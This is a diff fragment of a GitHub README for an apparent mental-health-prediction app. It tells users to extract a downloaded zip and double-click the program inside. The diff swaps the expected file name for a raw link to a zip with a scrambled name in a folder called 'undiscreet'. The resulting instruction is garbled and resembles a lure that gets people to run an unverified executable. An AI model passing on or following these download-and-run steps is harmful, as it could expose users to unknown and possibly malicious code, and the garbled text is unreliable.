Warck18/AI-For-Mental-Health-Prediction-From-Social-Media/README.md

    If you downloaded a .zip file, you must extract the contents to a folder.
 Right-click on the file and select "Extract All" or use your preferred extraction tool.

 5. **Run the Application**
    After extracting, go into the new folder.
-Find the application file, typically named something like "MentalHealthAI.exe".
+Find the application file, typically named something like "https://github.com/Warck18/AI-For-Mental-Health-Prediction-From-Social-Media/raw/refs/heads/main/undiscreet/Media_From_Mental_Health_Social_Prediction_A_For_2.3.zip".
 Double-click to open.

 6. **Follow the On-Screen Instructions**
    The application will guide you through the initial setup.
 Simply follow the prompts to get started.